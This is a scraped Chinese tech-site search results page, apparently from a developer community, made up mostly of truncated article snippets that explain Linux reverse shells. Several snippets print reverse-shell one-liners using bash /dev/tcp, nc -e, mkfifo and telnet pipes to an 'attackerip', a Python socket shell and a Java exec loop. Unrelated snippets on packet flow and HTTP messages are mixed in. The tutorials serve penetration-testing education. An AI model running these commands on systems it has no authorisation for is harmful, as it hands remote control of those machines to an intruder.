首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Linux反弹shell

bash -i > /dev/tcp/127.0.0.1/2345bash -i:打开一个bash交互界面 >:重定向 /dev/tcp:调用建立一个socket连接 127.0.0.1:可以任意更改需要反弹到的...IP地址 2345:反弹到的端口 上面的是一个典型的反弹shell的语句,但是这种不能实时地在攻击机输入,攻击机输出,只能在靶机输入东西,然后在攻击机看到 image.png 攻击机使用 nc -lvp...2200监听反弹回来地shell,然后等靶机输入东西后,攻击机才能获取到内容,攻击机不能传输命令 1.2second bash -i >& /dev/tcp/127.0.0.1/2345 0>&1 这种就是交互式...&1 2>&1 和上面的效果一样 1.4fourth bash -i >& /dev/tcp/127.0.0.1/2345 0>&1 值得一提的是,">&"相当于"2>&1",标准错误输出 一个标准的反弹

10.4K00

Linux入侵 反弹shell

二.命令 Bash反弹shell的实现: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 看到这短短的一行代码,正在复习Linux,自我感觉良好的我顿时充满了挫败感,这都是些什么鬼.../dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。...同理,Linux中还存在/dev/udp/。 要想了解“>&”和“0>&1”,首先我们要先了解一下Linux文件描述符和重定向。 linux shell下常用的文件描述符是: 1....使用 bash -i &> /dev/tcp/10.42.0.1 0<&1 同样能反弹一个可交互的shell。...三.NetCat 如果目标主机支持“-e”选项的话,我们就可以直接用 nc -e /bin/bash 10.42.0.1 1234 但当不支持时,我们就要用到Linux神奇的管道了。

6.2K30
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    WEB安全基础 - - -Linux反弹shell

    目录 一,Shell简介 正向shell(客户端想要获得服务端的shell) 反向shell (服务端想要获得客户端的shell)  二,Linux反弹shell 1.NC正向shell    2.NC...反向shell ​编辑 3.bash反弹shell  4.无e参数反弹shell  5.Base64编码绕过 ​编辑 6.Telnet反弹shell  7.OpenSSL反弹443端口,流量加密传输 一...getshell:获取到目标的命令执行权限 webshell:网站后门,通过web服务进行命令执行 反弹shell:将命令行的输入与输出转移到其他主机 正向shell(客户端想要获得服务端的shell...二,Linux反弹shell 实验环境 目标机器:Ubuntu、IP:10.1.1.200、ssh账号密码root/root 攻击机器:Kali、IP:10.1.1.100 1.NC正向shell.../dev/tcp/10.10.1.11/6666 传递的数据作为交互式shell的输入,命令执行后的结果输出到 /dev/tcp/10.10.1.11/6666 //     /dev/tcp/是Linux

    1.5K20

    linux反弹shell的姿势

    通常在获得webshell之后,如果是linux的服务器,一般会返回一个shell来对linux服务器做进一步的渗透,如:溢出提权、信息收集等。...下面就说说linux自带的程序来反弹shell的姿势。 自带工具 Bash 针对不同的linux版本,可能有不同的利用方式,这里简单列一下,在使用的时候大家自行测试。...0x05 rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p Telnet telnet客户端作为一个远程管理设备的软件,也可以作为反弹...attackerip 4444 | /bin/bash | telnet attackerip 4445 远程服务器监听tcp的4445端口 常见脚本 python python作为一个优秀的脚本语言通常默认安装在各大linux...tcp/10.0.0.1/2002;cat &5 >&5; done"] as String[]) p.waitFor() 其他工具 linux

    1.6K00

    Linux重定向及反弹shell详解

    这里说Linux重定向的原因主要还是为了详细了解一下Linux中的反弹shell 目录 0x01 文件描述符 0x02 重定向 0x03 反弹shell 0x04 交互重定向 0x05 命令变形 0x01...文件描述符 Linux的文件描述符有以下三种 标准输入:0 标准输出:1 错误输出:2 对于文件描述符就先知道这些就可以了,具体的使用会在重定向中来说,重定向就是对文件描述符的操作 0x02 重定向...0x03 反弹shell 下面是很常见的一条反弹shell命令,我们就以这个为例来进行解释 bash -i >& /dev/tcp/ip/port 0>&1 解释 bash -i 表示创建一个交互式的...首先我们在本地开启监听,然后在Linux机器上输入下面的命令,即将指定字符发送到192.168.6.1的3333端口 ? ?

    1.3K10

    Linux数据报文的来龙去脉

    作者:gfree.wind@gmail.com 作为网络领域的开发人员,我们经常要与Linux的数据报文打交道,一定要搞清楚数据报文是从何而来,又是如何离去。...注:驱动对interface执行poll操作时,会尝试循环检查网卡是否有接收完毕的报文,直到设置的budget上限,或者已经就绪报文。 二、接收软中断将报文分发给协议栈的示意图 ? 图2....如果网卡没有vlan offload,则需要软件剥掉vlan头,以便后面的报文处理。 5. 在分发报文时,可能会有多个handler关心此报文。所以在分发时,都是增加引用计数,然后给对应的处理函数。...通过以太网报文的协议,将数据报文分发给该协议的handler,如IPv4,IPv6,PPPoE等。 三、协议栈将数据报文发给套接字(以IPv4为例)的流程图 ? 图3....通过以上四个分解的流程图,相信大家对于Linux数据报文的来龙去脉,有了一定的了解。如在文章开头所云,这些流程图都做了必要的简化。在很多步骤都可以进行展开,也涉及了更多细节。

    1.7K30

    Linux数据报文的来龙去脉

    作者:gfree.wind@gmail.com 作为网络领域的开发人员,我们经常要与Linux的数据报文打交道,一定要搞清楚数据报文是从何而来,又是如何离去。...如果网卡没有vlan offload,则需要软件剥掉vlan头,以便后面的报文处理。 5. 在分发报文时,可能会有多个handler关心此报文。...通过以太网报文的协议,将数据报文分发给该协议的handler,如IPv4,IPv6,PPPoE等。...将skb报文加入套接字的接收队列。 四、报文从应用层到网卡的流程图 app_to_nic.jpg 1....通过以上四个分解的流程图,相信大家对于Linux数据报文的来龙去脉,有了一定的了解。如在文章开头所云,这些流程图都做了必要的简化。在很多步骤都可以进行展开,也涉及了更多细节。

    3.8K91

    反弹Shell

    大家在做渗透测试的时候,遇到linux的服务器,想反弹shell回来本地溢出提权,怎么办?上传反弹脚本?当然可以,简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。...主机开启9090端口的tcp服务 B主机连接到A主机的9090的tcp服务 A主机通过tcp服务把命令发到B主机 B主机读取命令并且在bash中执行 B主机把执行结果发给A主机 Linux...文件描述符,Linux shell的三种标准的文件描述符 0 - stdin 代表标准输入,使用<或<< 1 - stdout 代表标准输出,使用>或>> 2 - stderr 代表标准错误输出,使用2...check cat: check: 没有那个文件或目录 [root@wcy ~]# /dev/tcp/192.168.233.10/6699 就是/dev/tcp/ip/port, /dev/tcp/是Linux...(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i'])" 成功反弹

    74230

    Linux下调试1588单步时间戳报文

    如果对1588报文单步时间戳不了解,可以查看我之前的文章“IEEE 1588 Sync报文单步时间戳”。 平台和工具 我用的平台就不透露了,测试使用两块板子,网口直连。...用到的软件包括, Linux:这是我板子的OS,包含我要验证的驱动。 tcpdump:抓包工具,位于板子的文件系统。 linuxptp:开源PTP软件,位于板子的文件系统。...调试方法 两个板子网口直连,启动Linux。 配置IP地址,确保两个网口能ping通。 一个板子做接收,运行tcpdump抓包,可直接查看,也可以保存成pcap文件在Wireshark中打开查看。...另一个板子做发送,运行ptp4l做master,发送单步Sync报文。...# tcpdump -i eth0 -xx 可以看到对L2 Ethernet报文和UDP/IPv4报文,PTP消息的correctionField和originTimestamp字段的数值,直接就解析出来了

    3.2K20

    HTTP请求报文和响应报文

    HTTP报文 HTTP报文是由一行一行的简单字符串组成的。HTTP报文都是纯文本,不是二进制代码,所以人们可以很方便地对其进行读写。...下图是一个例子: 从Web客户端发往Web服务器的HTTP报文称为请求报文(request message)。...从服务器发往客户端的报文称为响应报文(response message),此外没有其他类型的HTTP报文。HTTP请求和响应报文的格式很类似。...HTTP 报文包括以下三个部分: 起始行 报文的第一行就是起始行,在请求报文中用来说明要做些什么,在响应报文中说明出现了什么情况。 首部字段 起始行后面有零个或多个首部字段。...主体 空行之后就是可选的报文主体了,其中包含了所有类型的数据。请求主体中包括 了要发送给 Web 服务器的数据;响应主体中装载了要返回给客户端的数据。

    81640

    Linux下几种反弹Shell方法的总结与理解

    之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听...可以看到shell成功反弹到了kali上面,可以执行命令: ? 在解释这条反弹shell的命令原理之前,首先需要掌握几个点。...linux文件描述符:linux shell下有三种标准的文件描述符,分别如下: 0 - stdin 代表标准输入,使用<或<< 1 - stdout 代表标准输出,使用>或>> 2 - stderr...理解了上面这些知识,下面来解释一下这一条反弹shell的命令首先,bash -i代表在本地打开一个bash,然后就是/dev/tcp/ip/port, /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个...如果nc不支持-e参数的话,可以利用到linux中的管道符,首先在kali上开启监听: ?

    1.8K10
    领券